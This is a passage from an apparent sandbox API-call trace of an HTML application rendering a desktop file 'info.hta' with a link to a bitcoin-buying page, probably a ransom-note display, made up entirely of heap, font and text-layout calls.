(wch=0x75) returned 0 [0228.317] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0228.317] IsCharSpaceW (wch=0x28) returned 0 [0228.317] IsCharSpaceW (wch=0x23) returned 0 [0228.317] IsCharSpaceW (wch=0x23) returned 0 [0228.317] IsCharSpaceW (wch=0x64) returned 0 [0228.317] IsCharSpaceW (wch=0x65) returned 0 [0228.318] IsCharSpaceW (wch=0x66) returned 0 [0228.318] IsCharSpaceW (wch=0x61) returned 0 [0228.318] IsCharSpaceW (wch=0x75) returned 0 [0228.318] IsCharSpaceW (wch=0x6c) returned 0 [0228.318] IsCharSpaceW (wch=0x74) returned 0 [0228.318] IsCharSpaceW (wch=0x23) returned 0 [0228.318] IsCharSpaceW (wch=0x41) returned 0 [0228.318] IsCharSpaceW (wch=0x50) returned 0 [0228.318] IsCharSpaceW (wch=0x50) returned 0 [0228.318] IsCharSpaceW (wch=0x4c) returned 0 [0228.318] IsCharSpaceW (wch=0x49) returned 0 [0228.318] IsCharSpaceW (wch=0x43) returned 0 [0228.318] IsCharSpaceW (wch=0x41) returned 0 [0228.318] IsCharSpaceW (wch=0x54) returned 0 [0228.318] IsCharSpaceW (wch=0x49) returned 0 [0228.318] IsCharSpaceW (wch=0x4f) returned 0 [0228.318] IsCharSpaceW (wch=0x4e) returned 0 [0228.318] IsCharSpaceW (wch=0x29) returned 0 [0228.318] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x36) returned 0x4afc40 [0228.318] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4db3b0 [0228.318] IsCharSpaceW (wch=0x0) returned 0 [0228.318] StrCmpICW (pszStr1="#default#APPLICATION", pszStr2="#default#APPLICATION") returned 0 [0228.318] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4afc40 | out: hHeap=0x470000) returned 1 [0228.318] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4db3b0 | out: hHeap=0x470000) returned 1 [0228.318] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.318] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4dfa08 [0228.321] LsGetRubyLsimethods () returned 0x0 [0228.321] LsGetTatenakayokoLsimethods () returned 0x0 [0228.321] LsGetHihLsimethods () returned 0x0 [0228.321] LsGetWarichuLsimethods () returned 0x0 [0228.321] LsGetReverseLsimethods () returned 0x0 [0228.321] LsCreateContext () returned 0x0 [0228.321] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x670) returned 0x4fac18 [0228.321] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x4d61b0 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x110) returned 0x4ca7a0 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x4d61e0 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2e4) returned 0x4fb290 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4da9f8 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4dac00 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa0) returned 0x4fb580 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4eb0c0 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4dac28 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4dac50 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4dac78 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4daca0 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x400) returned 0x4fb628 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d70e0 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d70f0 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d7100 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d7110 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x128) returned 0x4fba30 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x11c) returned 0x4fbb60 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x108) returned 0x4fbc88 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x130) returned 0x4fbd98 [0228.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x110) returned 0x4ca8b8 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x278) returned 0x4fbed0 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc8) returned 0x4fc150 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x190) returned 0x4fc220 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x78) returned 0x482968 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf0) returned 0x4fc3b8 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4c) returned 0x4dfa08 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x194) returned 0x4fc4b0 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc8) returned 0x4fc650 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x190) returned 0x4fc720 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x108) returned 0x4fc8b8 [0228.323] LsSetModWidthPairs () returned 0x0 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x240) returned 0x4fc9c8 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da698 [0228.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4dacc8 [0228.324] LsSetBreaking () returned 0x0 [0228.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x271) returned 0x4fd088 [0228.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4db3b0 [0228.324] LsSetDoc () returned 0x0 [0228.324] LsCreateLine () returned 0x0 [0228.324] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x4fd308 [0228.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da6b8 [0228.324] GetProcAddress (hModule=0x75450000, lpProcName="SHGetFolderPathW") returned 0x754d5708 [0228.451] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x41dfa8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0228.453] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft") returned 1 [0228.453] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer") returned 1 [0228.453] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer") returned 1 [0228.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0228.459] GetLastError () returned 0x0 [0228.498] GetFileSize (in: hFile=0x1c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0228.498] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=16384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4000 [0228.498] SetEndOfFile (hFile=0x1c8) returned 1 [0228.498] CreateFileMappingA (hFile=0x1c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName="MSIMGSIZECacheMap") returned 0x1a0 [0228.500] MapViewOfFile (hFileMappingObject=0x1a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4000) returned 0x700000 [0228.503] FlushViewOfFile (lpBaseAddress=0x700000, dwNumberOfBytesToFlush=0x4000) returned 1 [0228.574] ReleaseMutex (hMutex=0x238) returned 1 [0228.575] CloseHandle (hObject=0x238) returned 1 [0228.575] CloseHandle (hObject=0x1c8) returned 1 [0228.575] LoadImageW (hInst=0x73f40000, name=0x7ee, type=0x0, cx=0, cy=0, fuLoad=0x2000) returned 0x7050727 [0228.642] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x60) returned 0x4bb490 [0228.642] CreateCompatibleDC (hdc=0x0) returned 0x9010718 [0228.642] SetStretchBltMode (hdc=0x9010718, mode=3) returned 1 [0228.642] GetDIBits (in: hdc=0x9010718, hbm=0x7050727, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x41dde0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x41dde0) returned 1 [0228.642] SelectObject (hdc=0x9010718, h=0x7050727) returned 0x185000f [0228.642] GetDIBColorTable (in: hdc=0x9010718, iStart=0x0, cEntries=0x100, prgbq=0x41de08 | out: prgbq=0x41de08) returned 0x100 [0228.642] SelectObject (hdc=0x9010718, h=0x185000f) returned 0x7050727 [0228.642] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x100) returned 0x4d7328 [0228.642] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x428) returned 0x4f9b48 [0228.642] GetDIBits (in: hdc=0x9010718, hbm=0x7050727, start=0x0, cLines=0x10, lpvBits=0x4d7328, lpbmi=0x41dde0, usage=0x0 | out: lpvBits=0x4d7328, lpbmi=0x41dde0) returned 16 [0228.642] DeleteDC (hdc=0x9010718) returned 1 [0228.642] DeleteObject (ho=0x7050727) returned 1 [0228.642] LsdnFinishRegular () returned 0x0 [0228.643] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x4db540 [0228.691] GetOutlineTextMetricsW (in: hdc=0xc0106ce, cjCopy=0xd8, potm=0x41e260 | out: potm=0x41e260) returned 0xd8 [0228.692] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x90a0726 [0228.692] SelectObject (hdc=0xc0106ce, h=0x90a0726) returned 0x18a002e [0228.692] GetTextFaceW (in: hdc=0xc0106ce, c=32, lpName=0x41e4b0 | out: lpName="Tahoma") returned 7 [0228.692] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x90a0726 [0228.692] SelectObject (hdc=0xc0106ce, h=0x90a0726) returned 0x18a002e [0228.692] GetTextCharsetInfo (in: hdc=0xc0106ce, lpSig=0x41e418, dwFlags=0x0 | out: lpSig=0x41e418) returned 204 [0228.692] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x90a0726 [0228.692] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xc) returned 0x4db380 [0228.692] SelectObject (hdc=0xc0106ce, h=0x90a0726) returned 0x18a002e [0228.692] GetFontUnicodeRanges (in: hdc=0xc0106ce, lpgs=0x0 | out: lpgs=0x0) returned 0x208 [0228.692] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.692] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x208) returned 0x4f0258 [0228.692] GetFontUnicodeRanges (in: hdc=0xc0106ce, lpgs=0x4f0258 | out: lpgs=0x4f0258) returned 0x208 [0228.692] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x90a0726 [0228.696] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x17c) returned 0x4f8dc0 [0228.696] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x800) returned 0x4fd3c8 [0228.696] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x90a0726 [0228.697] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x4f8930 [0228.697] LsQueryLineDup () returned 0x0 [0228.697] LsDestroyLine () returned 0x0 [0228.697] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4da6b8 | out: hHeap=0x470000) returned 1 [0228.697] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.698] LsSetDoc () returned 0x0 [0228.698] LsCreateLine () returned 0x0 [0228.698] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.698] LsQueryLineDup () returned 0x0 [0228.698] LsDestroyLine () returned 0x0 [0228.698] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.698] LsSetDoc () returned 0x0 [0228.698] LsCreateLine () returned 0x0 [0228.698] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xf8) returned 0x4f9008 [0228.699] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fc150, Size=0x12c) returned 0x4ed030 [0228.699] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fc650, Size=0x12c) returned 0x4ed168 [0228.699] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fc220, Size=0x258) returned 0x4fe3d8 [0228.699] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fc720, Size=0x258) returned 0x4fc150 [0230.115] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ed030, Size=0x190) returned 0x4ff640 [0230.115] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ed168, Size=0x190) returned 0x4ff7d8 [0230.115] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fe3d8, Size=0x320) returned 0x4ff970 [0230.115] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4fc150, Size=0x320) returned 0x4ffc98 [0230.115] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x4fc748 [0230.116] LsQueryLineDup () returned 0x0 [0230.116] LsDestroyLine () returned 0x0 [0230.116] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.116] LsSetDoc () returned 0x0 [0230.116] LsCreateLine () returned 0x0 [0230.116] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.117] LsQueryLineDup () returned 0x0 [0230.117] LsDestroyLine () returned 0x0 [0230.117] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.117] LsSetDoc () returned 0x0 [0230.117] LsCreateLine () returned 0x0 [0230.117] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.119] LsQueryLineDup () returned 0x0 [0230.119] LsDestroyLine () returned 0x0 [0230.119] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.119] LsSetDoc () returned 0x0 [0230.119] LsCreateLine () returned 0x0 [0230.119] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.120] LsQueryLineDup () returned 0x0 [0230.120] LsDestroyLine () returned 0x0 [0230.120] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.120] LsSetDoc () returned 0x0 [0230.120] LsCreateLine () returned 0x0 [0230.120] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.247] GetOutlineTextMetricsW (in: hdc=0xc0106ce, cjCopy=0xd8, potm=0x41e2a0 | out: potm=0x41e2a0) returned 0xd8 [0230.249] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x50a0728 [0230.249] SelectObject (hdc=0xc0106ce, h=0x50a0728) returned 0x18a002e [0230.249] GetTextFaceW (in: hdc=0xc0106ce, c=32, lpName=0x41e4f0 | out: lpName="Tahoma") returned 7 [0230.249] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x50a0728 [0230.448] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x482968, Size=0x140) returned 0x4ed180 [0230.449] LsQueryLineDup () returned 0x0 [0230.449] LsDestroyLine () returned 0x0 [0230.449] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.449] LsSetDoc () returned 0x0 [0230.449] LsCreateLine () returned 0x0 [0230.449] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da6b8 [0230.449] LsGetRubyLsimethods () returned 0x0 [0230.449] LsGetTatenakayokoLsimethods () returned 0x0 [0230.449] LsGetHihLsimethods () returned 0x0 [0230.449] LsGetWarichuLsimethods () returned 0x0 [0230.450] LsGetReverseLsimethods () returned 0x0 [0230.450] LsCreateContext () returned 0x0 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x670) returned 0x501270 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x4d6210 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x110) returned 0x4ca9d0 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x4d62a0 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2e4) returned 0x5018e8 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4dae58 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4dae80 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa0) returned 0x4fc808 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4eb300 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4daea8 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4daed0 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4daef8 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4daf20 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x400) returned 0x501bd8 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d7120 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d7130 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d7140 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4d7150 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x128) returned 0x501fe0 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x11c) returned 0x502110 [0230.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x108) returned 0x502238 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x130) returned 0x502348 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x110) returned 0x4caae8 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x278) returned 0x502480 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc8) returned 0x4fc150 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x190) returned 0x502700 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x78) returned 0x482968 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf0) returned 0x502898 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4c) returned 0x4dfa60 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x194) returned 0x502990 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc8) returned 0x502b30 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x190) returned 0x502c00 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x108) returned 0x502d98 [0230.451] LsSetModWidthPairs () returned 0x0 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x240) returned 0x502ea8 [0230.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da658 [0230.452] LsSetBreaking () returned 0x0 [0230.452] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x271) returned 0x503568 [0230.452] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4db1b8 [0230.452] LsSetDoc () returned 0x0 [0230.452] LsCreateLine () returned 0x0 [0230.452] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.452] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x5037e8 [0230.452] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x5038a8 [0230.452] LsQueryLineDup () returned 0x0 [0230.452] LsDestroyLine () returned 0x0 [0230.452] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.452] LsdnFinishRegular () returned 0x0 [0230.452] LsQueryLineDup () returned 0x0 [0230.452] LsQueryLineCpPpoint () returned 0x0 [0230.453] LsDestroyLine () returned 0x0 [0230.453] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4da6b8 | out: hHeap=0x470000) returned 1 [0230.453] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.453] LsSetDoc () returned 0x0 [0230.453] LsCreateLine () returned 0x0 [0230.453] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.453] LsQueryLineDup () returned 0x0 [0230.453] LsDestroyLine () returned 0x0 [0230.453] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.454] LsSetDoc () returned 0x0 [0230.454] LsCreateLine () returned 0x0 [0230.454] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.454] LsQueryLineDup () returned 0x0 [0230.454] LsDestroyLine () returned 0x0 [0230.454] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.454] LsSetDoc () returned 0x0 [0230.454] LsCreateLine () returned 0x0 [0230.454] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.455] LsQueryLineDup () returned 0x0 [0230.455] LsDestroyLine () returned 0x0 [0230.455] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.455] LsSetDoc () returned 0x0 [0230.455] LsCreateLine () returned 0x0 [0230.455] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.455] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da6b8 [0230.455] LsSetDoc () returned 0x0 [0230.455] LsCreateLine () returned 0x0 [0230.455] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.455] LsQueryLineDup () returned 0x0 [0230.455] LsDestroyLine () returned 0x0 [0230.456] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.456] LsdnFinishRegular () returned 0x0 [0230.456] LsQueryLineDup () returned 0x0 [0230.456] LsQueryLineCpPpoint () returned 0x0 [0230.456] LsDestroyLine () returned 0x0 [0230.456] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4da6b8 | out: hHeap=0x470000) returned 1 [0230.456] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.456] LsSetDoc () returned 0x0 [0230.456] LsCreateLine () returned 0x0 [0230.456] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.457] LsQueryLineDup () returned 0x0 [0230.457] LsDestroyLine () returned 0x0 [0230.457] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0230.457] CreateUri (in: pwzURI="https://localbitcoins.com/buy_bitcoins", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x41e7cc | out: ppURI=0x41e7cc*=0x49d744) returned 0x0 [0230.605] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41e6e0 | out: ppu=0x41e6e0) returned 0x0 [0230.605] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41e79c | out: ppURI=0x41e79c*=0x49c07c) returned 0x0 [0230.605] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41e764 | out: ppvObject=0x41e764*=0x49c07c) returned 0x0 [0230.605] IUnknown:Release (This=0x49c07c) returned 0xd [0230.605] IUnknown:AddRef (This=0x49c07c) returned 0xe [0230.606] CoInternetCombineIUri (in: pBaseUri=0x49c07c, pRelativeUri=0x49d744, dwCombineFlags=0x6000000, ppCombinedUri=0x41e7d0, dwReserved=0x0 | out: ppCombinedUri=0x41e7d0*=0x49d744) returned 0x0 [0230.606] IUnknown:Release (This=0x49c07c) returned 0xe [0230.606] IUnknown:Release (This=0x49c07c) returned 0xd [0230.724] CoCreateInstance (in: rclsid=0x74102bc0*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74093cb0*(Data1=0x3c374a41, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), ppv=0x4a1fe4 | out: ppv=0x4a1fe4*=0x505568) returned 0x0 [0231.022] IUnknown:QueryInterface (in: This=0x505568, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x41e7dc | out: ppvObject=0x41e7dc*=0x505568) returned 0x0 [0231.955] IUnknown:Release (This=0x505568) returned 0x2 [0231.955] IUnknown:Release (This=0x49d744) returned 0x4 [0231.955] IUnknown:Release (This=0x49d744) returned 0x3 [0231.955] IsOS (dwOS=0x25) returned 1 [0231.955] GetSysColor (nIndex=26) returned 0xcc6600 [0231.955] LsSetDoc () returned 0x0 [0231.955] LsCreateLine () returned 0x0 [0231.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.956] LsQueryLineDup () returned 0x0 [0231.956] LsDestroyLine () returned 0x0 [0231.956] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.956] LsSetDoc () returned 0x0 